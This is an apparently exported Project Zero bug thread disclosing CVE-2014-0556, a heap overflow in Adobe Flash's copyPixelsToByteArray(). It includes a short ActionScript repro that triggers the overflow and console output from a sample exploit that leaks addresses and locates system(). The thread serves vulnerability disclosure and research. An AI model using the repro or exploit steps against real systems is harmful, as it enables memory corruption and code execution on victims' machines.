Flash heap buffer overflow calling copyPixelsToByteArray() on a large ByteArray

ganado / google-security-research

Automatically exported from code.google.com/p/google-security-research

0 stars 0 forks source link

Flash heap buffer overflow calling copyPixelsToByteArray() on a large ByteArray #46

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago

A SWF to reproduce is attached, along with source.

This is probably due to an integer overflow.

Note that this bug is almost certainly 64-bit only. The PoC relies on creating 
a ByteArray that is almost 4GB in size, and obviously such an allocation is 
never going to succeed in a 32-bit address space.

Also, the bug does not work in Chrome 64-bit Linux, because Chrome 64-bit Linux 
has a defense that limits total allocations to 4GB.

In order to repro, use 64-bit Flash in 64-bit IE, or run Chrome 64-bit Linux 
with the --no-sandbox flag (which disabled the 4GB limit).

Original issue reported on code.google.com by cev...@google.com on 14 Jul 2014 at 7:36

Attachments:

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 14 Jul 2014 at 7:38

Added labels: CCProjectZeroMembers

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 15 Jul 2014 at 5:22

Added labels: Id-2889

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 5 Sep 2014 at 11:00

Added labels: CVE-2014-0556

GoogleCodeExporter commented 9 years ago

Eep. This bug is actually really nasty on 32-bit, can't believe I missed it.
Repro from nicolas joly

var ba:ByteArray = new ByteArray();
ba.position = 0xFFFFF0004;
var bd:BitmapData = new BitmapData(0x100,0x100,true,0x12345678);
bd.copyPixelsToByteArray(new Rectangle(0,0,0x80,0x80), ba);

Original comment by cev...@google.com on 9 Sep 2014 at 8:11

GoogleCodeExporter commented 9 years ago

http://helpx.adobe.com/security/products/flash-player/apsb14-21.html

Will derestrict in a week or so, etc.

Original comment by cev...@google.com on 9 Sep 2014 at 8:15

Changed state: Fixed
Added labels: Fixed-2014-Sep-9

GoogleCodeExporter commented 9 years ago

Attaching a sample exploit for an old version of pepper Flash, 64-bit Linux.

Sample output to the browser JavaScript console:

---
And so it begins!
Starting search for trashed Vector
Found Vector with trashed length, num: 5
Found a Vector.<uint>, pos: 3332128
buffer address: 0x7fda9df9ad50
vtable value: 0x7fdaa3508d10
Found the specific Vector.<uint>, index: 2282
Found a ByteArray, pos: 3517486
Found the specific ByteArray, index: 5000
Current length is: 32
New length is: 1633771873
address of system plt: 0x7fdaa35a2050
address of system: 0x7fdab530a650
ByteArray vtable value: 0x7fdaa3515020
---

Original comment by cev...@google.com on 22 Sep 2014 at 7:26

Attachments:

GoogleCodeExporter commented 9 years ago

Making public.

Original comment by cev...@google.com on 23 Sep 2014 at 7:29

Removed labels: Restrict-View-Commit

GoogleCodeExporter commented 9 years ago

[deleted comment]

GoogleCodeExporter commented 9 years ago

thank you very much http://wdfshare.blogspot.com

Original comment by the961be...@gmail.com on 17 Mar 2015 at 7:46